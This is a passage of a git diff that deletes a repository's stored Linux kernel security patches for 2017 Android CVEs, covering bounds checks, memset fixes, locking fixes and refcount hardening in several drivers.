--				__func__, "SET_MODULE_PARAMS");
--			return -EINVAL;
--		}
--
- 		if (copy_from_user(&p_data, arg,
- 				   sizeof(p_data))) {
- 			dev_err(rtd->dev,
-@@ -1571,12 +1526,6 @@ static int msm_lsm_ioctl(struct snd_pcm_substream *substream,
- 		struct snd_lsm_event_status *user = NULL, userarg;
- 		dev_dbg(rtd->dev,
- 			"%s: SNDRV_LSM_EVENT_STATUS\n", __func__);
--		if (!arg) {
--			dev_err(rtd->dev,
--				"%s: Invalid params event status\n",
--				__func__);
--			return -EINVAL;
--		}
- 		if (copy_from_user(&userarg, arg, sizeof(userarg))) {
- 			dev_err(rtd->dev,
- 				"%s: err copyuser event_status\n",
--- 
-cgit v1.1
-
diff --git a/Patches/Linux_CVEs/CVE-2017-0533/ANY/0001.patch b/Patches/Linux_CVEs/CVE-2017-0533/ANY/0001.patch
deleted file mode 100644
index b08ceefb..00000000
--- a/Patches/Linux_CVEs/CVE-2017-0533/ANY/0001.patch
+++ /dev/null
@@ -1,73 +0,0 @@
-From e3af5e89426f1c8d4e703d415eff5435b925649f Mon Sep 17 00:00:00 2001
-From: Benet Clark <benetc@codeaurora.org>
-Date: Thu, 10 Nov 2016 17:49:09 -0800
-Subject: msm: mdss: Clear compat structures before copying to user
-
-In the compat layer, the temporary structures used to convert
-data from 32bit to 64bit structures need to be set to 0 before
-being assigned values.
-
-CRs-Fixed: 1088206
-Change-Id: I04497bc11e01c3df4beadfd6d9b06ab4321f1723
-Signed-off-by: Benet Clark <benetc@codeaurora.org>
----
- drivers/video/msm/mdss/mdss_compat_utils.c | 8 ++++++++
- 1 file changed, 8 insertions(+)
-
-diff --git a/drivers/video/msm/mdss/mdss_compat_utils.c b/drivers/video/msm/mdss/mdss_compat_utils.c
-index 5ad51dd..a9ab5c1 100644
---- a/drivers/video/msm/mdss/mdss_compat_utils.c
-+++ b/drivers/video/msm/mdss/mdss_compat_utils.c
-@@ -846,6 +846,7 @@ static int __from_user_pcc_coeff_v17(
- 		return -EFAULT;
- 	}
- 
-+	memset(&pcc_cfg_payload, 0, sizeof(pcc_cfg_payload));
- 	pcc_cfg_payload.r.b = pcc_cfg_payload32.r.b;
- 	pcc_cfg_payload.r.g = pcc_cfg_payload32.r.g;
- 	pcc_cfg_payload.r.c = pcc_cfg_payload32.r.c;
-@@ -1127,6 +1128,8 @@ static int __from_user_igc_lut_data_v17(
- 		pr_err("failed to copy payload from user for igc\n");
- 		return -EFAULT;
- 	}
-+
-+	memset(&igc_cfg_payload, 0, sizeof(igc_cfg_payload));
- 	igc_cfg_payload.c0_c1_data = compat_ptr(igc_cfg_payload_32.c0_c1_data);
- 	igc_cfg_payload.c2_data = compat_ptr(igc_cfg_payload_32.c2_data);
- 	igc_cfg_payload.len = igc_cfg_payload_32.len;
-@@ -1261,6 +1264,7 @@ static int __from_user_pgc_lut_data_v1_7(
- 		pr_err("failed to copy from user the pgc32 payload\n");
- 		return -EFAULT;
- 	}
-+	memset(&pgc_cfg_payload, 0, sizeof(pgc_cfg_payload));
- 	pgc_cfg_payload.c0_data = compat_ptr(pgc_cfg_payload_32.c0_data);
- 	pgc_cfg_payload.c1_data = compat_ptr(pgc_cfg_payload_32.c1_data);
- 	pgc_cfg_payload.c2_data = compat_ptr(pgc_cfg_payload_32.c2_data);
-@@ -1470,6 +1474,7 @@ static int __from_user_hist_lut_data_v1_7(
- 		return -EFAULT;
- 	}
- 
-+	memset(&hist_lut_cfg_payload, 0, sizeof(hist_lut_cfg_payload));
- 	hist_lut_cfg_payload.len = hist_lut_cfg_payload32.len;
- 	hist_lut_cfg_payload.data = compat_ptr(hist_lut_cfg_payload32.data);
- 
-@@ -2024,6 +2029,7 @@ static int __from_user_pa_data_v1_7(
- 		return -EFAULT;
- 	}
- 
-+	memset(&pa_cfg_payload, 0, sizeof(pa_cfg_payload));
- 	pa_cfg_payload.mode = pa_cfg_payload32.mode;
- 	pa_cfg_payload.global_hue_adj = pa_cfg_payload32.global_hue_adj;
- 	pa_cfg_payload.global_sat_adj = pa_cfg_payload32.global_sat_adj;
-@@ -2280,6 +2286,8 @@ static int __from_user_gamut_cfg_data_v17(
- 		pr_err("failed to copy the gamut payload from userspace\n");
- 		return -EFAULT;
- 	}
-+
-+	memset(&gamut_cfg_payload, 0, sizeof(gamut_cfg_payload));
- 	gamut_cfg_payload.mode = gamut_cfg_payload32.mode;
- 	for (i = 0; i < MDP_GAMUT_TABLE_NUM_V1_7; i++) {
- 		gamut_cfg_payload.tbl_size[i] =
--- 
-cgit v1.1
-
diff --git a/Patches/Linux_CVEs/CVE-2017-0534/ANY/0001.patch b/Patches/Linux_CVEs/CVE-2017-0534/ANY/0001.patch
deleted file mode 100644
index b08ceefb..00000000
--- a/Patches/Linux_CVEs/CVE-2017-0534/ANY/0001.patch
+++ /dev/null
@@ -1,73 +0,0 @@
-From e3af5e89426f1c8d4e703d415eff5435b925649f Mon Sep 17 00:00:00 2001
-From: Benet Clark <benetc@codeaurora.org>
-Date: Thu, 10 Nov 2016 17:49:09 -0800
-Subject: msm: mdss: Clear compat structures before copying to user
-
-In the compat layer, the temporary structures used to convert
-data from 32bit to 64bit structures need to be set to 0 before
-being assigned values.
-
-CRs-Fixed: 1088206
-Change-Id: I04497bc11e01c3df4beadfd6d9b06ab4321f1723
-Signed-off-by: Benet Clark <benetc@codeaurora.org>
----
- drivers/video/msm/mdss/mdss_compat_utils.c | 8 ++++++++
- 1 file changed, 8 insertions(+)
-
-diff --git a/drivers/video/msm/mdss/mdss_compat_utils.c b/drivers/video/msm/mdss/mdss_compat_utils.c
-index 5ad51dd..a9ab5c1 100644
---- a/drivers/video/msm/mdss/mdss_compat_utils.c
-+++ b/drivers/video/msm/mdss/mdss_compat_utils.c
-@@ -846,6 +846,7 @@ static int __from_user_pcc_coeff_v17(
- 		return -EFAULT;
- 	}
- 
-+	memset(&pcc_cfg_payload, 0, sizeof(pcc_cfg_payload));
- 	pcc_cfg_payload.r.b = pcc_cfg_payload32.r.b;
- 	pcc_cfg_payload.r.g = pcc_cfg_payload32.r.g;
- 	pcc_cfg_payload.r.c = pcc_cfg_payload32.r.c;
-@@ -1127,6 +1128,8 @@ static int __from_user_igc_lut_data_v17(
- 		pr_err("failed to copy payload from user for igc\n");
- 		return -EFAULT;
- 	}
-+
-+	memset(&igc_cfg_payload, 0, sizeof(igc_cfg_payload));
- 	igc_cfg_payload.c0_c1_data = compat_ptr(igc_cfg_payload_32.c0_c1_data);
- 	igc_cfg_payload.c2_data = compat_ptr(igc_cfg_payload_32.c2_data);
- 	igc_cfg_payload.len = igc_cfg_payload_32.len;
-@@ -1261,6 +1264,7 @@ static int __from_user_pgc_lut_data_v1_7(
- 		pr_err("failed to copy from user the pgc32 payload\n");
- 		return -EFAULT;
- 	}
-+	memset(&pgc_cfg_payload, 0, sizeof(pgc_cfg_payload));
- 	pgc_cfg_payload.c0_data = compat_ptr(pgc_cfg_payload_32.c0_data);
- 	pgc_cfg_payload.c1_data = compat_ptr(pgc_cfg_payload_32.c1_data);
- 	pgc_cfg_payload.c2_data = compat_ptr(pgc_cfg_payload_32.c2_data);
-@@ -1470,6 +1474,7 @@ static int __from_user_hist_lut_data_v1_7(
- 		return -EFAULT;
- 	}
- 
-+	memset(&hist_lut_cfg_payload, 0, sizeof(hist_lut_cfg_payload));
- 	hist_lut_cfg_payload.len = hist_lut_cfg_payload32.len;
- 	hist_lut_cfg_payload.data = compat_ptr(hist_lut_cfg_payload32.data);
- 
-@@ -2024,6 +2029,7 @@ static int __from_user_pa_data_v1_7(
- 		return -EFAULT;
- 	}
- 
-+	memset(&pa_cfg_payload, 0, sizeof(pa_cfg_payload));
- 	pa_cfg_payload.mode = pa_cfg_payload32.mode;
- 	pa_cfg_payload.global_hue_adj = pa_cfg_payload32.global_hue_adj;
- 	pa_cfg_payload.global_sat_adj = pa_cfg_payload32.global_sat_adj;
-@@ -2280,6 +2286,8 @@ static int __from_user_gamut_cfg_data_v17(
- 		pr_err("failed to copy the gamut payload from userspace\n");
- 		return -EFAULT;
- 	}
-+
-+	memset(&gamut_cfg_payload, 0, sizeof(gamut_cfg_payload));
- 	gamut_cfg_payload.mode = gamut_cfg_payload32.mode;
- 	for (i = 0; i < MDP_GAMUT_TABLE_NUM_V1_7; i++) {
- 		gamut_cfg_payload.tbl_size[i] =
--- 
-cgit v1.1
-
diff --git a/Patches/Linux_CVEs/CVE-2017-0535/ANY/0001.patch b/Patches/Linux_CVEs/CVE-2017-0535/ANY/0001.patch
deleted file mode 100644
index bd2d306a..00000000
--- a/Patches/Linux_CVEs/CVE-2017-0535/ANY/0001.patch
+++ /dev/null
@@ -1,13 +0,0 @@
-diff --git a/sound/soc/codecs/rt5506.c b/sound/soc/codecs/rt5506.c
-index 74572c4..fbce69a 100644
---- a/sound/soc/codecs/rt5506.c
-+++ b/sound/soc/codecs/rt5506.c
-@@ -676,6 +676,8 @@
- {
- 	if (mode >= rt5506_cfg_data.mode_num)
- 		return -EINVAL;
-+	if (rt5506_cfg_data.cmd_data[mode].config.reg_len > MAX_REG_DATA)
-+		return -EINVAL;
- 
- 	pr_info("%s: set mode %d\n", __func__, mode);
- 
diff --git a/Patches/Linux_CVEs/CVE-2017-0535/ANY/0001.patch.base64 b/Patches/Linux_CVEs/CVE-2017-0535/ANY/0001.patch.base64
deleted file mode 100644
index d785f6c6..00000000
--- a/Patches/Linux_CVEs/CVE-2017-0535/ANY/0001.patch.base64
+++ /dev/null
@@ -1 +0,0 @@
-ZGlmZiAtLWdpdCBhL3NvdW5kL3NvYy9jb2RlY3MvcnQ1NTA2LmMgYi9zb3VuZC9zb2MvY29kZWNzL3J0NTUwNi5jCmluZGV4IDc0NTcyYzQuLmZiY2U2OWEgMTAwNjQ0Ci0tLSBhL3NvdW5kL3NvYy9jb2RlY3MvcnQ1NTA2LmMKKysrIGIvc291bmQvc29jL2NvZGVjcy9ydDU1MDYuYwpAQCAtNjc2LDYgKzY3Niw4IEBACiB7CiAJaWYgKG1vZGUgPj0gcnQ1NTA2X2NmZ19kYXRhLm1vZGVfbnVtKQogCQlyZXR1cm4gLUVJTlZBTDsKKwlpZiAocnQ1NTA2X2NmZ19kYXRhLmNtZF9kYXRhW21vZGVdLmNvbmZpZy5yZWdfbGVuID4gTUFYX1JFR19EQVRBKQorCQlyZXR1cm4gLUVJTlZBTDsKIAogCXByX2luZm8oIiVzOiBzZXQgbW9kZSAlZFxuIiwgX19mdW5jX18sIG1vZGUpOwogCg==
\ No newline at end of file
diff --git a/Patches/Linux_CVEs/CVE-2017-0536/ANY/0001.patch b/Patches/Linux_CVEs/CVE-2017-0536/ANY/0001.patch
deleted file mode 100644
index 24e8b2ed..00000000
--- a/Patches/Linux_CVEs/CVE-2017-0536/ANY/0001.patch
+++ /dev/null
@@ -1,91 +0,0 @@
-From e6430a4da1fb0212a546379eadbe986f629c3ae9 Mon Sep 17 00:00:00 2001
-From: Andrew Chant <achant@google.com>
-Date: Fri, 13 Jan 2017 11:41:03 -0800
-Subject: [PATCH] input: synaptics_dsx: protect tmpbuf allocation.
-
-Protect tmpbuf from concurrent access by mutex.
-
-BUG: 33555878
-BUG: 33002026
-Change-Id: Ia7eeb59ca7b626f416e2298b4b9ffd960fe909e4
-Signed-off-by: Andrew Chant <achant@google.com>
----
- .../synaptics_dsx_htc_2.6/synaptics_dsx_rmi_dev.c  | 36 ++++++++++++++--------
- 1 file changed, 24 insertions(+), 12 deletions(-)
-
-diff --git a/drivers/input/touchscreen/synaptics_dsx_htc_2.6/synaptics_dsx_rmi_dev.c b/drivers/input/touchscreen/synaptics_dsx_htc_2.6/synaptics_dsx_rmi_dev.c
-index e699dfea50c81..6878b71da9be0 100644
---- a/drivers/input/touchscreen/synaptics_dsx_htc_2.6/synaptics_dsx_rmi_dev.c
-+++ b/drivers/input/touchscreen/synaptics_dsx_htc_2.6/synaptics_dsx_rmi_dev.c
-@@ -565,18 +565,24 @@ static ssize_t rmidev_read(struct file *filp, char __user *buf,
- 		return -EBADF;
- 	}
- 
--	if (count == 0)
--		return 0;
-+	mutex_lock(&(dev_data->file_mutex));
-+
-+	if (*f_pos > REG_ADDR_LIMIT) {
-+		retval = -EFAULT;
-+		goto clean_up;
-+	}
- 
- 	if (count > (REG_ADDR_LIMIT - *f_pos))
- 		count = REG_ADDR_LIMIT - *f_pos;
- 
-+	if (count == 0) {
-+		retval = 0;
-+		goto clean_up;
-+	}
- 	address = (unsigned short)(*f_pos);
- 
- 	rmidev_allocate_buffer(count);
- 
--	mutex_lock(&(dev_data->file_mutex));
--
- 	retval = synaptics_rmi4_reg_read(rmidev->rmi4_data,
- 			*f_pos,
- 			rmidev->tmpbuf,
-@@ -636,19 +642,25 @@ static ssize_t rmidev_write(struct file *filp, const char __user *buf,
- 		return -EBADF;
- 	}
- 
--	if (count == 0)
--		return 0;
-+	mutex_lock(&(dev_data->file_mutex));
- 
-+	if (*f_pos > REG_ADDR_LIMIT) {
-+		retval = -EFAULT;
-+		goto unlock;
-+	}
- 	if (count > (REG_ADDR_LIMIT - *f_pos))
- 		count = REG_ADDR_LIMIT - *f_pos;
-+	if (count == 0) {
-+		retval = 0;
-+		goto unlock;
-+	}
- 
- 	rmidev_allocate_buffer(count);
- 
--	if (copy_from_user(rmidev->tmpbuf, buf, count))
--		return -EFAULT;
--
--	mutex_lock(&(dev_data->file_mutex));
--
-+	if (copy_from_user(rmidev->tmpbuf, buf, count)) {
-+		retval = -EFAULT;
-+		goto unlock;
-+	}
- 	retval = synaptics_rmi4_reg_write(rmidev->rmi4_data,
- 			*f_pos,
- 			rmidev->tmpbuf,
-@@ -656,8 +668,8 @@ static ssize_t rmidev_write(struct file *filp, const char __user *buf,
- 	if (retval >= 0)
- 		*f_pos += retval;
- 
-+unlock:
- 	mutex_unlock(&(dev_data->file_mutex));
--
- 	return retval;
- }
- 
diff --git a/Patches/Linux_CVEs/CVE-2017-0537/ANY/0001.patch b/Patches/Linux_CVEs/CVE-2017-0537/ANY/0001.patch
deleted file mode 100644
index 9e080cd4..00000000
--- a/Patches/Linux_CVEs/CVE-2017-0537/ANY/0001.patch
+++ /dev/null
@@ -1,94 +0,0 @@
-From 389b185cb2f17fff994dbdf8d4bac003d4b2b6b3 Mon Sep 17 00:00:00 2001
-From: Jim Lin <jilin@nvidia.com>
-Date: Fri, 13 Jan 2017 16:07:58 +0800
-Subject: FROMLIST: CHROMIUM: usb: gadget: configfs: Fix KASAN use-after-free
-
-When gadget is disconnected, running sequence is like this.
-. android_work: sent uevent USB_STATE=DISCONNECTED
-. Call trace:
-  usb_string_copy+0xd0/0x128
-  gadget_config_name_configuration_store+0x4
-  gadget_config_name_attr_store+0x40/0x50
-  configfs_write_file+0x198/0x1f4
-  vfs_write+0x100/0x220
-  SyS_write+0x58/0xa8
-. configfs_composite_unbind
-. configfs_composite_bind
-
-In configfs_composite_bind, it has
-"cn->strings.s = cn->configuration;"
-
-When usb_string_copy is invoked. it would
-allocate memory, copy input string, release previous pointed memory space,
-and use new allocated memory.
-
-When gadget is connected, host sends down request to get information.
-Call trace:
-  usb_gadget_get_string+0xec/0x168
-  lookup_string+0x64/0x98
-  composite_setup+0xa34/0x1ee8
-  android_setup+0xb4/0x140
-
-If gadget is disconnected and connected quickly, in the failed case,
-cn->configuration memory has been released by usb_string_copy kfree but
-configfs_composite_bind hasn't been run in time to assign new allocated
-"cn->configuration" pointer to "cn->strings.s".
-
-When "strlen(s->s) of usb_gadget_get_string is being executed, the dangling
-memory is accessed, "BUG: KASAN: use-after-free" error occurs.
-
-BUG=chrome-os-partner:58412
-TEST=After smaug device was connected to ubuntu PC host, detached and attached
-type-C cable quickly several times without seeing
-"BUG: KASAN: use-after-free in usb_gadget_get_string".
-
-Bug: 31614969
-Change-Id: I58240ee7c55ae8f8fb8597d14f09c5ac07abb032
-Signed-off-by: Jim Lin <jilin@nvidia.com>
-Signed-off-by: Siqi Lin <siqilin@google.com>
-(am from https://chromium-review.googlesource.com/#/c/428059/3)
----
- drivers/usb/gadget/configfs.c | 17 ++++++++++++-----
- 1 file changed, 12 insertions(+), 5 deletions(-)
-
-diff --git a/drivers/usb/gadget/configfs.c b/drivers/usb/gadget/configfs.c
-index c484d9a..f7d8a3d 100644
---- a/drivers/usb/gadget/configfs.c
-+++ b/drivers/usb/gadget/configfs.c
-@@ -130,21 +130,28 @@ struct gadget_config_name {
- 	struct list_head list;
- };
- 
-+#define MAX_USB_STRING_LEN	126
-+#define MAX_USB_STRING_WITH_NULL_LEN	(MAX_USB_STRING_LEN+1)
-+
- static int usb_string_copy(const char *s, char **s_copy)
- {
- 	int ret;
- 	char *str;
- 	char *copy = *s_copy;
- 	ret = strlen(s);
--	if (ret > 126)
-+	if (ret > MAX_USB_STRING_LEN)
- 		return -EOVERFLOW;
- 
--	str = kstrdup(s, GFP_KERNEL);
--	if (!str)
--		return -ENOMEM;
-+	if (copy) {
-+		str = copy;
-+	} else {
-+		str = kmalloc(MAX_USB_STRING_WITH_NULL_LEN, GFP_KERNEL);
-+		if (!str)
-+			return -ENOMEM;
-+	}
-+	strncpy(str, s, MAX_USB_STRING_WITH_NULL_LEN);
- 	if (str[ret - 1] == '\n')
- 		str[ret - 1] = '\0';
--	kfree(copy);
- 	*s_copy = str;
- 	return 0;
- }
--- 
-cgit v1.1
-
diff --git a/Patches/Linux_CVEs/CVE-2017-0564/ANY/0001.patch b/Patches/Linux_CVEs/CVE-2017-0564/ANY/0001.patch
deleted file mode 100644
index c58ee33a..00000000
--- a/Patches/Linux_CVEs/CVE-2017-0564/ANY/0001.patch
+++ /dev/null
@@ -1,157 +0,0 @@
-From 941a80cf3340804e488c6ee2742e7a771bd01272 Mon Sep 17 00:00:00 2001
-From: Daniel Rosenberg <drosen@google.com>
-Date: Fri, 3 Feb 2017 20:37:06 -0800
-Subject: [PATCH] ANDROID: ion: Protect kref from userspace manipulation
-
-This separates the kref for ion handles into two components.
-Userspace requests through the ioctl will hold at most one
-reference to the internally used kref. All additional requests
-will increment a separate counter, and the original reference is
-only put once that counter hits 0. This protects the kernel from
-a poorly behaving userspace.
-
-Bug: 34276203
-
-Change-Id: Ibc36bc4405788ed0fea7337b541cad3be2b934c0
-Signed-off-by: Daniel Rosenberg <drosen@google.com>
----
- drivers/staging/android/ion/ion.c | 83 +++++++++++++++++++++++++++++++++++----
- 1 file changed, 76 insertions(+), 7 deletions(-)
-
-diff --git a/drivers/staging/android/ion/ion.c b/drivers/staging/android/ion/ion.c
-index 73fc9fd4c3e82..fdf761f623201 100755
---- a/drivers/staging/android/ion/ion.c
-+++ b/drivers/staging/android/ion/ion.c
-@@ -114,6 +114,7 @@ struct ion_client {
-  */
- struct ion_handle {
- 	struct kref ref;
-+	unsigned int user_ref_count;
- 	struct ion_client *client;
- 	struct ion_buffer *buffer;
- 	struct rb_node node;
-@@ -437,6 +438,48 @@ int ion_handle_put(struct ion_handle *handle)
- 	return ret;
- }
- 
-+/* Must hold the client lock */
-+static void user_ion_handle_get(struct ion_handle *handle)
-+{
-+	if (handle->user_ref_count++ == 0)
-+		kref_get(&handle->ref);
-+}
-+
-+/* Must hold the client lock */
-+static struct ion_handle *user_ion_handle_get_check_overflow(struct ion_handle *handle)
-+{
-+	if (handle->user_ref_count + 1 == 0)
-+		return ERR_PTR(-EOVERFLOW);
-+	user_ion_handle_get(handle);
-+	return handle;
-+}
-+
-+/* passes a kref to the user ref count.
-+ * We know we're holding a kref to the object before and
-+ * after this call, so no need to reverify handle. */
-+static struct ion_handle *pass_to_user(struct ion_handle *handle)
-+{
-+	struct ion_client *client = handle->client;
-+	struct ion_handle *ret;
-+
-+	mutex_lock(&client->lock);
-+	ret = user_ion_handle_get_check_overflow(handle);
-+	ion_handle_put_nolock(handle);
-+	mutex_unlock(&client->lock);
-+	return ret;
-+}
-+
-+/* Must hold the client lock */
-+static int user_ion_handle_put_nolock(struct ion_handle *handle)
-+{
-+	int ret;
-+
-+	if (--handle->user_ref_count == 0)
-+		ret = ion_handle_put_nolock(handle);
-+
-+	return ret;
-+}
-+
- static struct ion_handle *ion_handle_lookup(struct ion_client *client,
- 					    struct ion_buffer *buffer)
- {
-@@ -648,6 +691,25 @@ static void ion_free_nolock(struct ion_client *client, struct ion_handle *handle
- 	ion_handle_put_nolock(handle);
- }
- 
-+/* Must hold the client lock */
-+static void user_ion_free_nolock(struct ion_client *client, struct ion_handle *handle)
-+{
-+	bool valid_handle;
-+
-+	BUG_ON(client != handle->client);
-+
-+	valid_handle = ion_handle_validate(client, handle);
-+	if (!valid_handle) {
-+		WARN(1, "%s: invalid handle passed to free.\n", __func__);
-+		return;
-+	}
-+	if (handle->user_ref_count == 0) {
-+		WARN(1, "%s: User does not have access!\n", __func__);
-+		return;
-+	}
-+	user_ion_handle_put_nolock(handle);
-+}
-+
- void ion_free(struct ion_client *client, struct ion_handle *handle)
- {
- 	BUG_ON(client != handle->client);
-@@ -1513,7 +1575,7 @@ static long ion_ioctl(struct file *filp, unsigned int cmd, unsigned long arg)
- 						data.allocation.flags, true);
- 		if (IS_ERR(handle))
- 			return PTR_ERR(handle);
--
-+		pass_to_user(handle);
- 		data.allocation.handle = handle->id;
- 
- 		cleanup_handle = handle;
-@@ -1529,7 +1591,7 @@ static long ion_ioctl(struct file *filp, unsigned int cmd, unsigned long arg)
- 			mutex_unlock(&client->lock);
- 			return PTR_ERR(handle);
- 		}
--		ion_free_nolock(client, handle);
-+		user_ion_free_nolock(client, handle);
- 		ion_handle_put_nolock(handle);
- 		mutex_unlock(&client->lock);
- 		break;
-@@ -1553,10 +1615,15 @@ static long ion_ioctl(struct file *filp, unsigned int cmd, unsigned long arg)
- 		struct ion_handle *handle;
- 
- 		handle = ion_import_dma_buf(client, data.fd.fd);
--		if (IS_ERR(handle))
-+		if (IS_ERR(handle)) {
- 			ret = PTR_ERR(handle);
--		else
--			data.handle.handle = handle->id;
-+		} else {
-+			handle = pass_to_user(handle);
-+			if (IS_ERR(handle))
-+				ret = PTR_ERR(handle);
-+			else
-+				data.handle.handle = handle->id;
-+		}
- 		break;
- 	}
- 	case ION_IOC_SYNC:
-@@ -1588,8 +1655,10 @@ static long ion_ioctl(struct file *filp, unsigned int cmd, unsigned long arg)
- 	if (dir & _IOC_READ) {
- 		if (copy_to_user((void __user *)arg, &data, _IOC_SIZE(cmd))) {
- 			if (cleanup_handle) {
--				ion_free(client, cleanup_handle);
--				ion_handle_put(cleanup_handle);
-+				mutex_lock(&client->lock);
-+				user_ion_free_nolock(client, cleanup_handle);
-+				ion_handle_put_nolock(cleanup_handle);
-+				mutex_unlock(&client->lock);
- 			}
- 			return -EFAULT;
- 		}
diff --git a/Patches/Linux_CVEs/CVE-2017-0568/ANY/0001.patch b/Patches/Linux_CVEs/CVE-2017-0568/ANY/0001.patch
deleted file mode 100644
index 6cc32e48..00000000
--- a/Patches/Linux_CVEs/CVE-2017-0568/ANY/0001.patch
+++ /dev/null
@@ -1,79 +0,0 @@
-From b7fb46c77af4623291f53a5453df733b8fb1fe18 Mon Sep 17 00:00:00 2001
-From: Sudhir Kohalli <sudhir.kohalli@broadcom.com>
-Date: Fri, 20 Jan 2017 17:32:53 -0800
-Subject: [PATCH] net: wireless: bcmdhd: Heap overflow in wl_run_escan.
-
-1) The default_chan_list buffer overflow is avoided by checking
-n_nodfs index does not exceed num_chans, which is the length
-of default_chan_list buffer.
-2) The SSID length check 32(max limit) is done and then the SSID
-name copied in extra buffer is null terminated. The extra buffer
-is allocated a length of of 33 in wl_iw_ioctl.c.
-3) Issue of chances of cumulative results->pkt_count length
-exceeding allocated memory length of results->total_count is
-avoided in this fix. change_array is the destination array
-whose length is allocated to results->total_count.
-
-Signed-off-by: Sudhir Kohalli <sudhir.kohalli@broadcom.com>
-
-Bug: 34197514
-Bug: 34199963
-Bug: 34198729
-
-Change-Id: I0cd268ab696daac938a99f451607a3f4b2cfaed3
----
- drivers/net/wireless/bcmdhd/dhd_pno.c     | 12 +++++++++++-
- drivers/net/wireless/bcmdhd/wl_cfg80211.c |  9 ++++++++-
- 2 files changed, 19 insertions(+), 2 deletions(-)
-
-diff --git a/drivers/net/wireless/bcmdhd/dhd_pno.c b/drivers/net/wireless/bcmdhd/dhd_pno.c
-index ec2c347ca6219..95bfe2729855f 100644
---- a/drivers/net/wireless/bcmdhd/dhd_pno.c
-+++ b/drivers/net/wireless/bcmdhd/dhd_pno.c
-@@ -3622,7 +3622,17 @@ void * dhd_handle_swc_evt(dhd_pub_t *dhd, const void *event_data, int *send_evt_
- 	}
- 
- 	change_array = &params->change_array[params->results_rxed_so_far];
--	memcpy(change_array, results->list, sizeof(wl_pfn_significant_net_t) * results->pkt_count);
-+	if ((params->results_rxed_so_far + results->pkt_count) >
-+		results->total_count) {
-+		DHD_ERROR(("Error: Invalid data reset the counters!!\n"));
-+		*send_evt_bytes = 0;
-+		kfree(params->change_array);
-+		params->change_array = NULL;
-+		return ptr;
-+	}
-+
-+	memcpy(change_array, results->list,
-+		sizeof(wl_pfn_significant_net_t) * results->pkt_count);
- 	params->results_rxed_so_far += results->pkt_count;
- 
- 	if (params->results_rxed_so_far == results->total_count) {
-diff --git a/drivers/net/wireless/bcmdhd/wl_cfg80211.c b/drivers/net/wireless/bcmdhd/wl_cfg80211.c
-index 6cadcb56582be..063d49015e5a6 100644
---- a/drivers/net/wireless/bcmdhd/wl_cfg80211.c
-+++ b/drivers/net/wireless/bcmdhd/wl_cfg80211.c
-@@ -2288,6 +2288,9 @@ wl_run_escan(struct bcm_cfg80211 *cfg, struct net_device *ndev,
- 						/* allows only supported channel on
- 						*  current reguatory
- 						*/
-+						if (n_nodfs >= num_chans)
-+							break;
-+
- 						if (channel == (dtoh32(list->element[j])))
- 							default_chan_list[n_nodfs++] =
- 								channel;
-@@ -9315,8 +9318,12 @@ wl_notify_pfn_status(struct bcm_cfg80211 *cfg, bcm_struct_cfgdev *cfgdev,
- 	struct wiphy *wiphy = bcmcfg_to_wiphy(cfg);
- #endif /* GSCAN_SUPPORT */
- 
--	WL_ERR((">>> PNO Event\n"));
-+	if (!data) {
-+		WL_ERR(("Data is NULL!\n"));
-+		return 0;
-+	}
- 
-+	WL_DBG((">>> PNO Event\n"));
- 	ndev = cfgdev_to_wlc_ndev(cfgdev, cfg);
- 
- #ifdef GSCAN_SUPPORT
diff --git a/Patches/Linux_CVEs/CVE-2017-0568/ANY/0002.patch b/Patches/Linux_CVEs/CVE-2017-0568/ANY/0002.patch
deleted file mode 100644
index 599e4f30..00000000
--- a/Patches/Linux_CVEs/CVE-2017-0568/ANY/0002.patch
+++ /dev/null
@@ -1,35 +0,0 @@
-From a3f3e7ed54aaa4f5f6929f1ed460363fdc8964d6 Mon Sep 17 00:00:00 2001
-From: Insun Song <insun.song@broadcom.com>
-Date: Fri, 13 Jan 2017 16:25:59 -0800
-Subject: [PATCH] net: wireless: bcmdhd: fix overrun in wl_run_escan
-
-prevent buffer overrun case where WLC_GET_VALID_CHANNELS IOCTL
- overriden by attacker and its return manipulated.
-
-Signed-off-by: Insun Song <insun.song@broadcom.com>
-Change-Id: Ifbbaa3c2bdfd9bea7533d605303f18e17c8d85cc
-Bug: 34197514
----
- drivers/net/wireless/bcmdhd/wl_cfg80211.c | 9 +++++++++
- 1 file changed, 9 insertions(+)
-
-diff --git a/drivers/net/wireless/bcmdhd/wl_cfg80211.c b/drivers/net/wireless/bcmdhd/wl_cfg80211.c
-index 41d07d310a7b2..c635b1b8a79af 100644
---- a/drivers/net/wireless/bcmdhd/wl_cfg80211.c
-+++ b/drivers/net/wireless/bcmdhd/wl_cfg80211.c
-@@ -2268,6 +2268,15 @@ wl_run_escan(struct bcm_cfg80211 *cfg, struct net_device *ndev,
- 			if (!wl_get_valid_channels(ndev, chan_buf, sizeof(chan_buf))) {
- 				list = (wl_uint32_list_t *) chan_buf;
- 				n_valid_chan = dtoh32(list->count);
-+
-+				if (n_valid_chan > WL_NUMCHANNELS) {
-+					WL_ERR(("wrong n_valid_chan:%d\n",
-+						n_valid_chan));
-+					kfree(default_chan_list);
-+					err = -EINVAL;
-+					goto exit;
-+				}
-+
- 				for (i = 0; i < num_chans; i++)
- 				{
- 					_freq = request->channels[i]->center_freq;
diff --git a/Patches/Linux_CVEs/CVE-2017-0569/3.10/0001.patch b/Patches/Linux_CVEs/CVE-2017-0569/3.10/0001.patch
deleted file mode 100644
index 6cc32e48..00000000
--- a/Patches/Linux_CVEs/CVE-2017-0569/3.10/0001.patch
+++ /dev/null
@@ -1,79 +0,0 @@
-From b7fb46c77af4623291f53a5453df733b8fb1fe18 Mon Sep 17 00:00:00 2001
-From: Sudhir Kohalli <sudhir.kohalli@broadcom.com>
-Date: Fri, 20 Jan 2017 17:32:53 -0800
-Subject: [PATCH] net: wireless: bcmdhd: Heap overflow in wl_run_escan.
-
-1) The default_chan_list buffer overflow is avoided by checking
-n_nodfs index does not exceed num_chans, which is the length
-of default_chan_list buffer.
-2) The SSID length check 32(max limit) is done and then the SSID
-name copied in extra buffer is null terminated. The extra buffer
-is allocated a length of of 33 in wl_iw_ioctl.c.
-3) Issue of chances of cumulative results->pkt_count length
-exceeding allocated memory length of results->total_count is
-avoided in this fix. change_array is the destination array
-whose length is allocated to results->total_count.
-
-Signed-off-by: Sudhir Kohalli <sudhir.kohalli@broadcom.com>
-
-Bug: 34197514
-Bug: 34199963
-Bug: 34198729
-
-Change-Id: I0cd268ab696daac938a99f451607a3f4b2cfaed3
----
- drivers/net/wireless/bcmdhd/dhd_pno.c     | 12 +++++++++++-
- drivers/net/wireless/bcmdhd/wl_cfg80211.c |  9 ++++++++-
- 2 files changed, 19 insertions(+), 2 deletions(-)
-
